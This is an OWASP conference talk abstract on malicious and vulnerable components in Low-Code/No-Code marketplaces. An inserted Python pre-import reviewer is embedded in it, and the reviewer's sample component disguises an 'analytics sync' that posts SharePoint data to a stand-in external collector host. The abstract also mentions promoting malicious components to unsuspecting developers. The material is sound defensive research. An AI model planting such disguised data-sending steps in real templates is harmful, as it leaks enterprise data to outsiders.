
No Code you shall use, malware you shall get 

OWASP Foundation

Slides: static.sched.c...
Our research explores the possibility of spreading malware and launching supply chain attacks through the marketplace functionality of leading Low-Code/No-Code application development platforms. Low-Code/No-Code (LCNC) platforms are quickly becoming the go-to technology for building enterprise applications. As their usage becomes widespread, they all adopt some form of code reuse and code sharing mechanism built around a marketplace. Whether it is Forge for Outsystems, AppSource for Microsoft PowerApps or the UiPath Marketplace, every platform has adopted the idea of letting app developers get a head start (or rely entirely) on content created and publicly shared by other developers. Introducing applications that are based on marketplace components and templates exposes an enterprise to two types of threat: malicious (no) code and vulnerabilities.
The first involves a threat actor who creates a component with intentional, undesired functionality and places it in the marketplace. When developers introduce the malicious component or application into their LCNC environment, the malicious functionality executes in the context of the enterprise's permissions, giving the attacker internal access to data and machines.
The second threat pertains to applications and components that were shared through the marketplace without a thorough security review. These components contain security vulnerabilities, and when developers introduce them into the organization's LCNC environment they expose enterprise data to those same vulnerabilities. Both threats are pressing in the LCNC domain, as there are very few tools and practices for weeding out security vulnerabilities from no-code applications, and even fewer for detecting the presence of undesired, malicious functionality.
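A pre-import check of the kind the abstract says is largely missing, as an added example that is not part of the talk or of Nokod Security's tooling: a small Python reviewer that statically inspects a marketplace component's definition before it is imported, flagging raw HTTP calls to non-allowlisted hosts, connectors the component uses without declaring or approval, and, most usefully, any such outbound action that carries the output of an approved internal connector (enterprise data flowing to a sink the organization does not control). The manifest layout, the connector names, the allowlists and the sample component are all constructed assumptions, loosely modelled on exported flow definitions rather than any vendor's real schema.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample manifest. The layout (actions keyed by name, a "type", and
# "inputs" carrying "uri"/"connection"/"body" with @body('...') references to
# other actions) is an assumption loosely modelled on exported flow
# definitions; it is not any vendor's real schema.
SAMPLE_COMPONENT = json.dumps({
    "name": "Invoice approval template",
    "declaredConnections": ["shared_sharepointonline", "shared_office365users"],
    "actions": {
        "Get_invoices": {"type": "ApiConnection",
                         "inputs": {"connection": "shared_sharepointonline", "method": "get"}},
        "Notify_manager": {"type": "ApiConnection",
                           "inputs": {"connection": "shared_office365users", "method": "post",
                                      "body": "@body('Get_invoices')"}},
        # The "analytics sync" quietly posts the SharePoint data to an external host.
        "Sync_to_analytics": {"type": "Http",
                              "inputs": {"method": "POST",
                                         "uri": "https://collector.example.net/ingest",
                                         "body": "@body('Get_invoices')"}},
        # An undeclared, unapproved connector that also receives the same data.
        "Archive": {"type": "ApiConnection",
                    "inputs": {"connection": "shared_ftp", "method": "put",
                               "body": "@outputs('Get_invoices')"}},
    },
})

# Expression syntax for "use the output of action X" (assumed, see above).
REF_PATTERN = re.compile(r"@(?:body|outputs)\('([^']+)'\)")


def referenced_actions(inputs):
    """Names of the other actions whose output these inputs consume."""
    return set(REF_PATTERN.findall(json.dumps(inputs)))


def review_component(manifest_json, allowed_hosts, allowed_connectors):
    """Static pre-import review of one marketplace component.

    Returns a list of findings. Each records the offending action, a severity,
    a reason, and 'carries': the approved internal connector actions whose
    output feeds that action, i.e. the data that would leave the tenant.
    """
    manifest = json.loads(manifest_json)
    actions = manifest.get("actions", {})
    declared = set(manifest.get("declaredConnections", []))
    findings = []

    def internal_sources(inputs):
        # Which referenced actions read through an approved connector?
        return sorted(
            name for name in referenced_actions(inputs)
            if actions.get(name, {}).get("type") == "ApiConnection"
            and actions[name].get("inputs", {}).get("connection") in allowed_connectors
        )

    for name, action in actions.items():
        inputs = action.get("inputs", {})
        kind = action.get("type")
        if kind == "Http":
            host = urlparse(inputs.get("uri", "")).hostname or ""
            if host not in allowed_hosts:
                findings.append({
                    "action": name, "severity": "high",
                    "reason": f"HTTP {inputs.get('method', '?')} to unapproved host {host or '<none>'}",
                    "carries": internal_sources(inputs),
                })
        elif kind == "ApiConnection":
            conn = inputs.get("connection", "")
            if conn not in allowed_connectors:
                findings.append({"action": name, "severity": "high",
                                 "reason": f"uses connector {conn!r} not on the approved list",
                                 "carries": internal_sources(inputs)})
            elif conn not in declared:
                findings.append({"action": name, "severity": "medium",
                                 "reason": f"uses connector {conn!r} the component did not declare",
                                 "carries": internal_sources(inputs)})
        else:
            findings.append({"action": name, "severity": "medium",
                             "reason": f"unrecognised action type {kind!r}; review manually",
                             "carries": internal_sources(inputs)})
    return findings


def import_decision(findings):
    """Block when internal data reaches an uncontrolled sink; otherwise allow or queue for review."""
    if any(f["severity"] == "high" and f["carries"] for f in findings):
        return "block"
    return "review" if findings else "allow"


if __name__ == "__main__":
    results = review_component(
        SAMPLE_COMPONENT,
        allowed_hosts={"graph.microsoft.com"},
        allowed_connectors={"shared_sharepointonline", "shared_office365users"},
    )
    for f in results:
        print(f["severity"], f["action"], f["reason"], "carries:", f["carries"])
    print("decision:", import_decision(results))
```

The decision rule is the point, not the field names: an outbound action is judged by where its data comes from as well as where it goes, because a template that reads SharePoint and posts the result to an external collector looks identical to a benign analytics integration until source and sink are correlated. A static pass like this cannot see connectors resolved at install time or logic hidden in expressions it does not parse, so it is a gate in front of review, not a replacement for it.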
The session discusses and demonstrates our attempts to introduce vulnerable and malicious components into the marketplaces of various LCNC platforms. We show what worked and what did not, and discuss methods that could be used to overcome existing guardrails. We also discuss methods for promoting our malicious or vulnerable components and applications in ways that increase the chances of their being used by unsuspecting developers. The session includes demonstrations of some potential outcomes of malicious and vulnerable LCNC components.
Amichai Shulman
Nokod Security
CTO and co-founder
Amichai Shulman is the CTO and co-founder of Nokod Security. He is a cyber security researcher, entrepreneur and investor with more than 30 years of cyber security experience in military, government and commercial environments. He co-founded Imperva in 2002 and served as the company's CTO for over 15 years, driving innovation and thought leadership. For the past 20 years Amichai has been involved in leading innovation in the cyber security industry through research. He is a frequent speaker at top-tier conferences including RSAC, Infosec, BlackHat and OWASP AppSec, and his research and commentary are regularly published in industry magazines such as The Register and Dark Reading, and in the general press such as the New York Times. As a seed investor and advisor, Amichai has successfully accompanied a number of startup companies (including Intsights, SkyFence, Lacoon and Indegy) and is currently also an advisor and board member for a number of cyber security startups. Amichai is also an Adjunct Teacher at the Technion Institute of Technology, where he teaches cyber security to graduate and undergraduate students and conducts independent research. Amichai holds a B.Sc. and an M.Sc. in Computer Science.
Managed by the OWASP® Foundation
owasp.org/

Published: 28 Jan 2024
